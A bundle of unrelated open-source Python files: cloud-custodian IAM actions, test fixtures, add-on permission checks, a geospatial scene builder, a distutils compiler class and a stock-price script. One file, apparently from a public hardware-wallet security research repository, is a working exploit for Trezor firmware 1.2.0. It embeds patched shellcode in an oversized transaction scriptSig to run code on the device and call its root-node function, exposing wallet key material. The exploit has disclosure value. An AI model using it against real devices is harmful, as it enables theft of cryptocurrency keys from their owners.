for key in response.get('SSHPublicKeys', ()):
client.delete_ssh_public_key(
UserName=r['UserName'], SSHPublicKeyId=key['SSHPublicKeyId'])
@staticmethod
def delete_signing_certificates(client, r):
response = client.list_signing_certificates(UserName=r['UserName'])
for cert in response.get('Certificates', ()):
client.delete_signing_certificate(
UserName=r['UserName'], CertificateId=cert['CertificateId'])
@staticmethod
def delete_service_specific_credentials(client, r):
# Service specific user credentials (codecommit)
response = client.list_service_specific_credentials(UserName=r['UserName'])
for screds in response.get('ServiceSpecificCredentials', ()):
client.delete_service_specific_credential(
UserName=r['UserName'],
ServiceSpecificCredentialId=screds['ServiceSpecificCredentialId'])
@staticmethod
def delete_user(client, r):
client.delete_user(UserName=r['UserName'])
def process(self, resources):
client = local_session(self.manager.session_factory).client('iam')
self.log.debug('Deleting user %s options: %s' %
(len(resources), self.data.get('options', 'all')))
for r in resources:
self.process_user(client, r)
def process_user(self, client, r):
user_options = self.data.get('options', list(self.ORDERED_OPTIONS.keys()))
# resolve compound options
for cmd in self.COMPOUND_OPTIONS:
if cmd in user_options:
user_options += self.COMPOUND_OPTIONS[cmd]
# process options in ordered fashion
for cmd in self.ORDERED_OPTIONS:
if cmd in user_options:
op = getattr(self, self.ORDERED_OPTIONS[cmd])
op(client, r)
if not self.data.get('options'):
self.delete_user(client, r)
@User.action_registry.register('remove-keys')
class UserRemoveAccessKey(BaseAction):
"""Delete or disable user's access keys.
For example if we wanted to disable keys after 90 days of non-use and
delete them after 180 days of nonuse:
:example:
.. code-block:: yaml
- name: iam-mfa-active-key-no-login
resource: iam-user
actions:
- type: remove-keys
disable: true
age: 90
- type: remove-keys
age: 180
"""
schema = type_schema(
'remove-keys',
matched={'type': 'boolean'},
age={'type': 'number'},
disable={'type': 'boolean'})
permissions = ('iam:ListAccessKeys', 'iam:UpdateAccessKey',
'iam:DeleteAccessKey')
def validate(self):
if self.data.get('matched') and self.data.get('age'):
raise PolicyValidationError(
"policy:%s cant mix matched and age parameters")
ftypes = {f.type for f in self.manager.iter_filters()}
if 'credential' in ftypes and 'access-key' in ftypes:
raise PolicyValidationError(
"policy:%s cant mix credential and access-key filters w/ delete action")
return self
def process(self, resources):
client = local_session(self.manager.session_factory).client('iam')
age = self.data.get('age')
disable = self.data.get('disable')
matched = self.data.get('matched')
if age:
threshold_date = datetime.datetime.now(tz=tzutc()) - timedelta(age)
for r in resources:
if 'c7n:AccessKeys' not in r:
r['c7n:AccessKeys'] = client.list_access_keys(
UserName=r['UserName'])['AccessKeyMetadata']
keys = r['c7n:AccessKeys']
if matched:
m_keys = resolve_credential_keys(
r.get(CredentialReport.matched_annotation_key),
keys)
assert m_keys, "shouldn't have gotten this far without keys"
keys = m_keys
for k in keys:
if age:
if not k['CreateDate'] < threshold_date:
continue
if disable:
client.update_access_key(
UserName=r['UserName'],
AccessKeyId=k['AccessKeyId'],
Status='Inactive')
else:
client.delete_access_key(
UserName=r['UserName'],
AccessKeyId=k['AccessKeyId'])
def resolve_credential_keys(m_keys, keys):
res = []
for k in m_keys:
if k['c7n:match-type'] == 'credential':
c_date = parse_date(k['last_rotated'])
for ak in keys:
if c_date == ak['CreateDate']:
ak = dict(ak)
ak['c7n:match-type'] = 'access'
if ak not in res:
res.append(ak)
elif k not in res:
res.append(k)
return res
#################
# IAM Groups #
#################
@Group.filter_registry.register('has-users')
class IamGroupUsers(Filter):
"""Filter IAM groups that have users attached based on True/False value:
True: Filter all IAM groups with users assigned to it
False: Filter all IAM groups without any users assigned to it
:example:
.. code-block:: yaml
- name: empty-iam-group
resource: iam-group
filters:
- type: has-users
value: False
"""
schema = type_schema('has-users', value={'type': 'boolean'})
permissions = ('iam:GetGroup',)
def _user_count(self, client, resource):
return len(client.get_group(GroupName=resource['GroupName'])['Users'])
def process(self, resources, events=None):
c = local_session(self.manager.session_factory).client('iam')
if self.data.get('value', True):
return [r for r in resources if self._user_count(c, r) > 0]
return [r for r in resources if self._user_count(c, r) == 0]
@Group.filter_registry.register('has-inline-policy')
class IamGroupInlinePolicy(Filter):
"""Filter IAM groups that have an inline-policy based on boolean value:
True: Filter all groups that have an inline-policy attached
False: Filter all groups that do not have an inline-policy attached
:example:
.. code-block:: yaml
- name: iam-groups-with-inline-policy
resource: iam-group
filters:
- type: has-inline-policy
value: True
"""
schema = type_schema('has-inline-policy', value={'type': 'boolean'})
permissions = ('iam:ListGroupPolicies',)
def _inline_policies(self, client, resource):
resource['c7n:InlinePolicies'] = client.list_group_policies(
GroupName=resource['GroupName'])['PolicyNames']
return resource
def process(self, resources, events=None):
c = local_session(self.manager.session_factory).client('iam')
value = self.data.get('value', True)
res = []
for r in resources:
r = self._inline_policies(c, r)
if len(r['c7n:InlinePolicies']) > 0 and value:
res.append(r)
if len(r['c7n:InlinePolicies']) == 0 and not value:
res.append(r)
return res
|
{
"content_hash": "afa04e7ab3c14bf60fa6469c566fe269",
"timestamp": "",
"source": "github",
"line_count": 2006,
"max_line_length": 99,
"avg_line_length": 32.98354935194417,
"alnum_prop": 0.5734451749414343,
"repo_name": "Sutto/cloud-custodian",
"id": "1f6bdd0c6828feda6a2540a1b1db09471d8fb529",
"size": "66755",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "c7n/resources/iam.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "7986"
},
{
"name": "Go",
"bytes": "146630"
},
{
"name": "HTML",
"bytes": "31"
},
{
"name": "Makefile",
"bytes": "9971"
},
{
"name": "PowerShell",
"bytes": "1804"
},
{
"name": "Python",
"bytes": "5283859"
},
{
"name": "Shell",
"bytes": "12627"
},
{
"name": "Smarty",
"bytes": "359"
}
],
"symlink_target": ""
}
|
from trezorlib import *
from trezorlib.client import TrezorClient
from trezorlib.transport_hid import HidTransport
import trezorlib.messages_pb2 as proto
import trezorlib.types_pb2 as types
import binascii
# 1.2.0
getRootNode = 0x080108c0
oledClear = 0x0801af38
oledDrawString = 0x0801b0fc
oledRefresh = 0x0801af48
fic = open("hax.o", "rb")
shell = bytearray(fic.read()[0x34:0x100])
fic.close()
getRootNode+=1
oledClear+=1
oledDrawString+=1
oledRefresh+=1
shell[len(shell) - 4] = (oledRefresh & 0xff)
shell[len(shell) - 3] = ((oledRefresh >> 8) & 0xff)
shell[len(shell) - 2] = ((oledRefresh >> 16) & 0xff)
shell[len(shell) - 1] = ((oledRefresh >> 24) & 0xff)
shell[len(shell) - 8] = (oledDrawString & 0xff)
shell[len(shell) - 7] = ((oledDrawString >> 8) & 0xff)
shell[len(shell) - 6] = ((oledDrawString >> 16) & 0xff)
shell[len(shell) - 5] = ((oledDrawString >> 24) & 0xff)
shell[len(shell) - 12] = (oledClear & 0xff)
shell[len(shell) - 11] = ((oledClear >> 8) & 0xff)
shell[len(shell) - 10] = ((oledClear >> 16) & 0xff)
shell[len(shell) - 9] = ((oledClear >> 24) & 0xff)
shell[len(shell) - 16] = (getRootNode & 0xff)
shell[len(shell) - 15] = ((getRootNode >> 8) & 0xff)
shell[len(shell) - 14] = ((getRootNode >> 16) & 0xff)
shell[len(shell) - 13] = ((getRootNode >> 24) & 0xff)
shell = str(shell)
print binascii.hexlify(shell)
DUMMY_SIZE = 500
SEQ = 0x01234567
SIG_DUMMY = shell
SIG_DUMMY += "\x63\xfd\x01\x20" * ((DUMMY_SIZE - len(shell)) / 4) # 1.2.0
devices = HidTransport.enumerate()
client = TrezorClient(HidTransport(devices[0]))
client.transport.session_begin()
tx = proto.SignTx()
tx.inputs_count = 1
tx.outputs_count = 1
tx.coin_name = "Bitcoin"
res = client.call(tx)
if isinstance(res, proto.Failure):
raise CallException("Signing failed")
if not isinstance(res, proto.TxRequest):
raise CallException("Unexpected message")
print res
msg = types.TransactionType()
testInput = types.TxInputType(address_n=[0],
prev_hash=binascii.unhexlify('d5f65ee80147b4bcc70b75e4bbf2d7382021b871bd8867ef8fa525ef50864882'),
prev_index=0,
script_sig=SIG_DUMMY,
sequence=SEQ
)
msg.inputs.extend([ testInput ])
res = client.call(proto.TxAck(tx = msg))
if isinstance(res, proto.Failure):
raise CallException("Signing failed")
if not isinstance(res, proto.TxRequest):
raise CallException("Unexpected message")
print res
msg = types.TransactionType()
msg.version = 1
msg.lock_time = 0
msg.inputs_cnt = 1
msg.outputs_cnt = 0
res = client.call(proto.TxAck(tx = msg))
if isinstance(res, proto.Failure):
raise CallException("Signing failed")
if not isinstance(res, proto.TxRequest):
raise CallException("Unexpected message")
print res
msg = types.TransactionType()
testInput = types.TxInputType(address_n=[0],
prev_hash=binascii.unhexlify('d5f65ee80147b4bcc70b75e4bbf2d7382021b871bd8867ef8fa525ef50864882'),
prev_index=0,
script_sig=SIG_DUMMY,
sequence=SEQ
)
msg.inputs.extend([ testInput ])
res = client.call(proto.TxAck(tx = msg)) # bye
if isinstance(res, proto.Failure):
raise CallException("Signing failed")
if not isinstance(res, proto.TxRequest):
raise CallException("Unexpected message")
print res
|
{
"content_hash": "0b1cc64508253322a75d02461211be1c",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 126,
"avg_line_length": 26.841269841269842,
"alnum_prop": 0.6655824955647546,
"repo_name": "btchip/trezor-security-exploits",
"id": "39fd34c52e72e5ed6e69973f8fefe9624554ff55",
"size": "3614",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "1.2.0-scriptSigExploit/scriptSigExploit.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "1620"
},
{
"name": "Python",
"bytes": "10985"
}
],
"symlink_target": ""
}
|
import functools
import pytest
from plenum.common.average_strategies import MedianLowStrategy
from plenum.server.instances import Instances
from plenum.server.monitor import Monitor
from plenum.test.helper import sdk_eval_timeout, sdk_send_random_request, sdk_get_reply
from plenum.test.testing_utils import FakeSomething
@pytest.fixture()
def requests(looper, sdk_wallet_client, sdk_pool_handle):
requests = []
for i in range(5):
req = sdk_send_random_request(looper, sdk_pool_handle, sdk_wallet_client)
req, _ = sdk_get_reply(looper, req, timeout=sdk_eval_timeout(1, 4))
requests.append(req)
return requests
@pytest.fixture
def decreasedMonitoringTimeouts(tconf, request):
oldDashboardUpdateFreq = tconf.DashboardUpdateFreq
tconf.DashboardUpdateFreq = 1
def reset():
tconf.DashboardUpdateFreq = oldDashboardUpdateFreq
request.addfinalizer(reset)
return tconf
@pytest.fixture(scope='function')
def fake_monitor(tconf):
def getThroughput(self, instId):
return self.throughputs[instId].throughput
throughputs = dict()
instances = Instances()
num_of_replicas = 5
for i in range(num_of_replicas):
throughputs[i] = Monitor.create_throughput_measurement(tconf)
instances.add(i)
monitor = FakeSomething(
throughputs=throughputs,
instances=instances,
Delta=tconf.DELTA,
throughput_avg_strategy_cls=MedianLowStrategy,
)
monitor.numOrderedRequests = dict()
for i in range(num_of_replicas):
monitor.numOrderedRequests[i] = (100, 100)
monitor.getThroughputs = functools.partial(Monitor.getThroughputs, monitor)
monitor.getThroughput = functools.partial(getThroughput, monitor)
monitor.getInstanceMetrics = functools.partial(Monitor.getInstanceMetrics, monitor)
monitor.instance_throughput_ratio = functools.partial(Monitor.instance_throughput_ratio, monitor)
monitor.is_instance_throughput_too_low = functools.partial(Monitor.is_instance_throughput_too_low, monitor)
monitor.addInstance = functools.partial(Monitor.addInstance, monitor)
return monitor
|
{
"content_hash": "0f981f84b7c82a05ff0df90630d15a74",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 111,
"avg_line_length": 35.78333333333333,
"alnum_prop": 0.7377736376339078,
"repo_name": "evernym/zeno",
"id": "c408b76b01480a3be2a935dc56f0b44ee213516f",
"size": "2147",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "plenum/test/monitoring/conftest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "531061"
}
],
"symlink_target": ""
}
|
from olympia import amo
def match_rules(rules, app, action):
"""
This will match rules found in Group.
"""
for rule in rules.split(','):
rule_app, rule_action = rule.split(':')
if rule_app == '*' or rule_app == app:
if (rule_action == '*'
or rule_action == action
or action == '%'):
return True
return False
def action_allowed(request, app, action):
"""
Determines if the request user has permission to do a certain action
'Admin:%' is true if the user has any of:
('Admin:*', 'Admin:%s'%whatever, '*:*',) as rules.
"""
allowed = any(match_rules(group.rules, app, action) for group in
getattr(request, 'groups', ()))
return allowed
def action_allowed_user(user, app, action):
"""Similar to action_allowed, but takes user instead of request."""
allowed = any(match_rules(group.rules, app, action) for group in
user.groups.all())
return allowed
def submission_allowed(user, parsed_addon_data):
"""Experiments can only be submitted by the people with the right group.
See bug 1220097.
"""
return (
not parsed_addon_data.get('is_experiment', False) or
action_allowed_user(user, 'Experiments', 'submit'))
def check_ownership(request, obj, require_owner=False, require_author=False,
ignore_disabled=False, admin=True):
"""
A convenience function. Check if request.user has permissions
for the object.
"""
if hasattr(obj, 'check_ownership'):
return obj.check_ownership(request, require_owner=require_owner,
require_author=require_author,
ignore_disabled=ignore_disabled,
admin=admin)
return False
def check_collection_ownership(request, collection, require_owner=False):
if not request.user.is_authenticated():
return False
if action_allowed(request, 'Admin', '%'):
return True
elif action_allowed(request, 'Collections', 'Edit'):
return True
elif request.user.id == collection.author_id:
return True
elif not require_owner:
return collection.publishable_by(request.user)
else:
return False
def check_addon_ownership(request, addon, viewer=False, dev=False,
support=False, admin=True, ignore_disabled=False):
"""
Check request.user's permissions for the addon.
If user is an admin they can do anything.
If the add-on is disabled only admins have permission.
If they're an add-on owner they can do anything.
dev=True checks that the user has an owner or developer role.
viewer=True checks that the user has an owner, developer, or viewer role.
support=True checks that the user has a support role.
"""
if not request.user.is_authenticated():
return False
# Deleted addons can't be edited at all.
if addon.is_deleted:
return False
# Users with 'Addons:Edit' can do anything.
if admin and action_allowed(request, 'Addons', 'Edit'):
return True
# Only admins can edit admin-disabled addons.
if addon.status == amo.STATUS_DISABLED and not ignore_disabled:
return False
# Addon owners can do everything else.
roles = (amo.AUTHOR_ROLE_OWNER,)
if dev:
roles += (amo.AUTHOR_ROLE_DEV,)
# Viewer privs are implied for devs.
elif viewer:
roles += (amo.AUTHOR_ROLE_DEV, amo.AUTHOR_ROLE_VIEWER,
amo.AUTHOR_ROLE_SUPPORT)
# Support can do support.
elif support:
roles += (amo.AUTHOR_ROLE_SUPPORT,)
return addon.authors.filter(pk=request.user.pk,
addonuser__role__in=roles).exists()
def check_addons_reviewer(request):
return action_allowed(request, 'Addons', 'Review')
def check_unlisted_addons_reviewer(request):
return action_allowed(request, 'Addons', 'ReviewUnlisted')
def check_personas_reviewer(request):
return action_allowed(request, 'Personas', 'Review')
def is_editor(request, addon):
"""Return True if the user is an addons reviewer, or a personas reviewer
and the addon is a persona."""
return (check_addons_reviewer(request) or
(check_personas_reviewer(request) and addon.is_persona()))
|
{
"content_hash": "38636c398593abfac499338ba965b7d0",
"timestamp": "",
"source": "github",
"line_count": 131,
"max_line_length": 77,
"avg_line_length": 33.656488549618324,
"alnum_prop": 0.627126332501701,
"repo_name": "jpetto/olympia",
"id": "81c658bcff50ad1d13c1a999bb18e7600dce5cf6",
"size": "4409",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/olympia/access/acl.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "249"
},
{
"name": "CSS",
"bytes": "665496"
},
{
"name": "HTML",
"bytes": "1606994"
},
{
"name": "JavaScript",
"bytes": "1315514"
},
{
"name": "Makefile",
"bytes": "4235"
},
{
"name": "PLSQL",
"bytes": "74"
},
{
"name": "Python",
"bytes": "4026490"
},
{
"name": "Shell",
"bytes": "9145"
},
{
"name": "Smarty",
"bytes": "1930"
}
],
"symlink_target": ""
}
|
from typing import List
from shapely.geometry import Polygon, mapping, shape
from rastervision.core.box import Box
from rastervision.core.data import (
ClassConfig, CRSTransformer, GeoJSONVectorSourceConfig, RasterioSource,
RasterizedSource, Scene, SemanticSegmentationLabelSource,
transform_geojson, geometries_to_geojson)
def make_scene(scene_id: str, class_config: ClassConfig, img_info: dict,
labels_uri: str, aoi_polygons: List[Polygon]) -> Scene:
raster_source = make_raster_source(img_info)
extent = raster_source.get_extent()
crs_transformer = raster_source.get_crs_transformer()
label_source = make_label_source(
labels_uri=labels_uri,
class_config=class_config,
extent=extent,
crs_transformer=crs_transformer)
# transform AOI to pixel coords
aoi_polygons = aoi_to_pixel_coords(aoi_polygons, crs_transformer)
scene = Scene(
id=scene_id,
raster_source=raster_source,
ground_truth_label_source=label_source,
aoi_polygons=aoi_polygons)
return scene
def make_raster_source(img_info: dict) -> RasterioSource:
img_uri = img_info['ingestLocation']
if not isinstance(img_uri, list):
img_uri = [img_uri]
raster_source = RasterioSource(uris=img_uri, channel_order=[0, 1, 2])
return raster_source
def make_label_source(
labels_uri: str, class_config: ClassConfig, extent: Box,
crs_transformer: CRSTransformer) -> SemanticSegmentationLabelSource:
geojson_cfg = GeoJSONVectorSourceConfig(
uri=labels_uri, default_class_id=1, ignore_crs_field=True)
vector_source = geojson_cfg.build(class_config, crs_transformer)
label_source = SemanticSegmentationLabelSource(
raster_source=RasterizedSource(
vector_source=vector_source,
background_class_id=0,
extent=extent,
crs_transformer=crs_transformer),
null_class_id=0)
return label_source
def aoi_to_pixel_coords(aoi_polygons: List[Polygon],
crs_transformer: CRSTransformer) -> List[Polygon]:
"""Transform AOI to pixel coordinates"""
polygon_geojsons = [mapping(p) for p in aoi_polygons]
full_geojson = geometries_to_geojson(polygon_geojsons)
transformed_geojson = transform_geojson(full_geojson, crs_transformer)
transformed_polygons = [
shape(f['geometry']) for f in transformed_geojson['features']
]
return transformed_polygons
|
{
"content_hash": "8a12e399e2c6de204664275e9400713f",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 76,
"avg_line_length": 36.661764705882355,
"alnum_prop": 0.690734055354994,
"repo_name": "azavea/raster-foundry",
"id": "c25643e82428333ce7181998b944192480132627",
"size": "2493",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "app-hitl/hitl/src/hitl/rv/data.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "111670"
},
{
"name": "HTML",
"bytes": "189623"
},
{
"name": "JavaScript",
"bytes": "499670"
},
{
"name": "Nginx",
"bytes": "1202"
},
{
"name": "Python",
"bytes": "132877"
},
{
"name": "Ruby",
"bytes": "1272"
},
{
"name": "Scala",
"bytes": "991596"
},
{
"name": "Shell",
"bytes": "37380"
}
],
"symlink_target": ""
}
|
"""distutils.emxccompiler
Provides the EMXCCompiler class, a subclass of UnixCCompiler that
handles the EMX port of the GNU C compiler to OS/2.
"""
# issues:
#
# * OS/2 insists that DLLs can have names no longer than 8 characters
# We put export_symbols in a def-file, as though the DLL can have
# an arbitrary length name, but truncate the output filename.
#
# * only use OMF objects and use LINK386 as the linker (-Zomf)
#
# * always build for multithreading (-Zmt) as the accompanying OS/2 port
# of Python is only distributed with threads enabled.
#
# tested configurations:
#
# * EMX gcc 2.81/EMX 0.9d fix03
__revision__ = "$Id$"
import os,sys,copy
from distutils.ccompiler import gen_preprocess_options, gen_lib_options
from distutils.unixccompiler import UnixCCompiler
from distutils.file_util import write_file
from distutils.errors import DistutilsExecError, CompileError, UnknownFileError
from distutils import log
class EMXCCompiler (UnixCCompiler):
compiler_type = 'emx'
obj_extension = ".obj"
static_lib_extension = ".lib"
shared_lib_extension = ".dll"
static_lib_format = "%s%s"
shared_lib_format = "%s%s"
res_extension = ".res" # compiled resource file
exe_extension = ".exe"
def __init__ (self,
verbose=0,
dry_run=0,
force=0):
UnixCCompiler.__init__ (self, verbose, dry_run, force)
(status, details) = check_config_h()
self.debug_print("Python's GCC status: %s (details: %s)" %
(status, details))
if status is not CONFIG_H_OK:
self.warn(
"Python's pyconfig.h doesn't seem to support your compiler. " +
("Reason: %s." % details) +
"Compiling may fail because of undefined preprocessor macros.")
(self.gcc_version, self.ld_version) = \
get_versions()
self.debug_print(self.compiler_type + ": gcc %s, ld %s\n" %
(self.gcc_version,
self.ld_version) )
# Hard-code GCC because that's what this is all about.
# XXX optimization, warnings etc. should be customizable.
self.set_executables(compiler='gcc -Zomf -Zmt -O3 -fomit-frame-pointer -mprobe -Wall',
compiler_so='gcc -Zomf -Zmt -O3 -fomit-frame-pointer -mprobe -Wall',
linker_exe='gcc -Zomf -Zmt -Zcrtdll',
linker_so='gcc -Zomf -Zmt -Zcrtdll -Zdll')
# want the gcc library statically linked (so that we don't have
# to distribute a version dependent on the compiler we have)
self.dll_libraries=["gcc"]
# __init__ ()
def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts):
if ext == '.rc':
# gcc requires '.rc' compiled to binary ('.res') files !!!
try:
self.spawn(["rc", "-r", src])
except DistutilsExecError, msg:
raise CompileError, msg
else: # for other files use the C-compiler
try:
self.spawn(self.compiler_so + cc_args + [src, '-o', obj] +
extra_postargs)
except DistutilsExecError, msg:
raise CompileError, msg
def link (self,
target_desc,
objects,
output_filename,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
# use separate copies, so we can modify the lists
extra_preargs = copy.copy(extra_preargs or [])
libraries = copy.copy(libraries or [])
objects = copy.copy(objects or [])
# Additional libraries
libraries.extend(self.dll_libraries)
# handle export symbols by creating a def-file
# with executables this only works with gcc/ld as linker
if ((export_symbols is not None) and
(target_desc != self.EXECUTABLE)):
# (The linker doesn't do anything if output is up-to-date.
# So it would probably better to check if we really need this,
# but for this we had to insert some unchanged parts of
# UnixCCompiler, and this is not what we want.)
# we want to put some files in the same directory as the
# object files are, build_temp doesn't help much
# where are the object files
temp_dir = os.path.dirname(objects[0])
# name of dll to give the helper files the same base name
(dll_name, dll_extension) = os.path.splitext(
os.path.basename(output_filename))
# generate the filenames for these files
def_file = os.path.join(temp_dir, dll_name + ".def")
# Generate .def file
contents = [
"LIBRARY %s INITINSTANCE TERMINSTANCE" % \
os.path.splitext(os.path.basename(output_filename))[0],
"DATA MULTIPLE NONSHARED",
"EXPORTS"]
for sym in export_symbols:
contents.append(' "%s"' % sym)
self.execute(write_file, (def_file, contents),
"writing %s" % def_file)
# next add options for def-file and to creating import libraries
# for gcc/ld the def-file is specified as any other object files
objects.append(def_file)
#end: if ((export_symbols is not None) and
# (target_desc != self.EXECUTABLE or self.linker_dll == "gcc")):
# who wants symbols and a many times larger output file
# should explicitly switch the debug mode on
# otherwise we let dllwrap/ld strip the output file
# (On my machine: 10KB < stripped_file < ??100KB
# unstripped_file = stripped_file + XXX KB
# ( XXX=254 for a typical python extension))
if not debug:
extra_preargs.append("-s")
UnixCCompiler.link(self,
target_desc,
objects,
output_filename,
output_dir,
libraries,
library_dirs,
runtime_library_dirs,
None, # export_symbols, we do this in our def-file
debug,
extra_preargs,
extra_postargs,
build_temp,
target_lang)
# link ()
# -- Miscellaneous methods -----------------------------------------
# override the object_filenames method from CCompiler to
# support rc and res-files
def object_filenames (self,
source_filenames,
strip_dir=0,
output_dir=''):
if output_dir is None: output_dir = ''
obj_names = []
for src_name in source_filenames:
# use normcase to make sure '.rc' is really '.rc' and not '.RC'
(base, ext) = os.path.splitext (os.path.normcase(src_name))
if ext not in (self.src_extensions + ['.rc']):
raise UnknownFileError, \
"unknown file type '%s' (from '%s')" % \
(ext, src_name)
if strip_dir:
base = os.path.basename (base)
if ext == '.rc':
# these need to be compiled to object files
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
else:
obj_names.append (os.path.join (output_dir,
base + self.obj_extension))
return obj_names
# object_filenames ()
# override the find_library_file method from UnixCCompiler
# to deal with file naming/searching differences
def find_library_file(self, dirs, lib, debug=0):
shortlib = '%s.lib' % lib
longlib = 'lib%s.lib' % lib # this form very rare
# get EMX's default library directory search path
try:
emx_dirs = os.environ['LIBRARY_PATH'].split(';')
except KeyError:
emx_dirs = []
for dir in dirs + emx_dirs:
shortlibp = os.path.join(dir, shortlib)
longlibp = os.path.join(dir, longlib)
if os.path.exists(shortlibp):
return shortlibp
elif os.path.exists(longlibp):
return longlibp
# Oops, didn't find it in *any* of 'dirs'
return None
# class EMXCCompiler
# Because these compilers aren't configured in Python's pyconfig.h file by
# default, we should at least warn the user if he is using a unmodified
# version.
CONFIG_H_OK = "ok"
CONFIG_H_NOTOK = "not ok"
CONFIG_H_UNCERTAIN = "uncertain"
def check_config_h():
"""Check if the current Python installation (specifically, pyconfig.h)
appears amenable to building extensions with GCC. Returns a tuple
(status, details), where 'status' is one of the following constants:
CONFIG_H_OK
all is well, go ahead and compile
CONFIG_H_NOTOK
doesn't look good
CONFIG_H_UNCERTAIN
not sure -- unable to read pyconfig.h
'details' is a human-readable string explaining the situation.
Note there are two ways to conclude "OK": either 'sys.version' contains
the string "GCC" (implying that this Python was built with GCC), or the
installed "pyconfig.h" contains the string "__GNUC__".
"""
# XXX since this function also checks sys.version, it's not strictly a
# "pyconfig.h" check -- should probably be renamed...
from distutils import sysconfig
import string
# if sys.version contains GCC then python was compiled with
# GCC, and the pyconfig.h file should be OK
if string.find(sys.version,"GCC") >= 0:
return (CONFIG_H_OK, "sys.version mentions 'GCC'")
fn = sysconfig.get_config_h_filename()
try:
# It would probably better to read single lines to search.
# But we do this only once, and it is fast enough
f = open(fn)
s = f.read()
f.close()
except IOError, exc:
# if we can't read this file, we cannot say it is wrong
# the compiler will complain later about this file as missing
return (CONFIG_H_UNCERTAIN,
"couldn't read '%s': %s" % (fn, exc.strerror))
else:
# "pyconfig.h" contains an "#ifdef __GNUC__" or something similar
if string.find(s,"__GNUC__") >= 0:
return (CONFIG_H_OK, "'%s' mentions '__GNUC__'" % fn)
else:
return (CONFIG_H_NOTOK, "'%s' does not mention '__GNUC__'" % fn)
def get_versions():
""" Try to find out the versions of gcc and ld.
If not possible it returns None for it.
"""
from distutils.version import StrictVersion
from distutils.spawn import find_executable
import re
gcc_exe = find_executable('gcc')
if gcc_exe:
out = os.popen(gcc_exe + ' -dumpversion','r')
out_string = out.read()
out.close()
result = re.search('(\d+\.\d+\.\d+)',out_string)
if result:
gcc_version = StrictVersion(result.group(1))
else:
gcc_version = None
else:
gcc_version = None
# EMX ld has no way of reporting version number, and we use GCC
# anyway - so we can link OMF DLLs
ld_version = None
return (gcc_version, ld_version)
|
{
"content_hash": "94540a340f6d6cf856918fd7b7bb4ea3",
"timestamp": "",
"source": "github",
"line_count": 315,
"max_line_length": 97,
"avg_line_length": 37.63492063492063,
"alnum_prop": 0.5602699283002952,
"repo_name": "nvoron23/socialite",
"id": "f52e63232db1afa9b14ee4a074d57c2a004b2b3d",
"size": "11855",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "jython/Lib/distutils/emxccompiler.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "GAP",
"bytes": "35416"
},
{
"name": "Groff",
"bytes": "21"
},
{
"name": "HTML",
"bytes": "111577"
},
{
"name": "Java",
"bytes": "2253475"
},
{
"name": "Python",
"bytes": "10833034"
},
{
"name": "R",
"bytes": "752"
},
{
"name": "Shell",
"bytes": "29299"
},
{
"name": "Visual Basic",
"bytes": "481"
}
],
"symlink_target": ""
}
|
import json
import os.path
from typing import List
from typing import Tuple
from typing import TypeVar
from typing import Dict
import random
import arrow
import attr
import requests
@attr.s
class StockInfo(object):
ticker = attr.ib(type=str)
price = attr.ib(converter=float)
week_ago = attr.ib(converter=float)
mo_ago = attr.ib(converter=float)
quarter_ago = attr.ib(converter=float)
yr_ago = attr.ib(converter=float)
last_updated = attr.ib(type=str)
@attr.s
class PortfolioItem(object):
ticker = attr.ib(type=str)
# Same stock can be present in multiple rows.
row_ids = attr.ib(type=list)
count = attr.ib(type=int)
stock_info = attr.ib(type=StockInfo)
T = TypeVar('T') # Generic Type
config = json.load(open(os.path.expanduser('~/.airtable_keys.json')))
STOCK_INFO_CSV = os.path.expanduser('~/.airtable_stocks.json')
ALPHA_ADVANTAGE_KEY = config['AlphaAdvantage']
AIRTABLE_KEY = config['Airtable']['Key']
AIRTABLE_BASE_ID = config['Airtable']['BaseId']
STOCKS_TABLE_NAME = 'Stocks'
PORTFOLIO_TABLE_NAME = 'Portfolio'
MAX_RPM = 5
def DateNDaysAgo(n: int) -> str:
return arrow.utcnow().shift(days=-n).format('YYYY-MM-DD')
def DictToShuffledList(dct: Dict[str, T]) -> List[Tuple[str, T]]:
ret = list(dct.items())
random.shuffle(ret)
return ret
last_aa_request_time = arrow.get(1970, 1, 1)
# Alpha advantage has a MAX_RPS. This must be called before making API call.
def GetAlphaAdvantageApproval():
global last_aa_request_time
global MAX_RPM
next_allowed_time = last_aa_request_time.shift(seconds=int(1 + (60.0 / MAX_RPM)))
if next_allowed_time < arrow.utcnow():
print('{} No Wait'.format(arrow.utcnow()))
last_aa_request_time = arrow.utcnow()
return
wait_time = next_allowed_time - arrow.utcnow()
import time
print('{} Start Wait. Waiting for '.format(arrow.utcnow()), wait_time)
time.sleep(wait_time.total_seconds())
print('{} End Wait'.format(arrow.utcnow()))
last_aa_request_time = arrow.utcnow()
def CleanupAlphaAdvantageResponse(response):
def transform_key(key):
import re
key = key.lower()
key = re.sub(r'^\d+\.\s+', '', key)
key = re.sub(r'[()]', ' ', key)
key = key.strip()
key = re.sub(r'\s+', '_', key)
return key
numeric_keys = {'adjusted_close'}
ignore_keys = {'open', 'high', 'low', 'close', 'volume', 'dividend_amount', 'split_coefficient',
'meta_data'}
if type(response) == list:
return [CleanupAlphaAdvantageResponse(item) for item in response]
elif isinstance(response, dict):
transformed = {transform_key(key): CleanupAlphaAdvantageResponse(value) for key, value in
response.items()}
transformed = {k: float(v) if k in numeric_keys else v for k, v in transformed.items() if
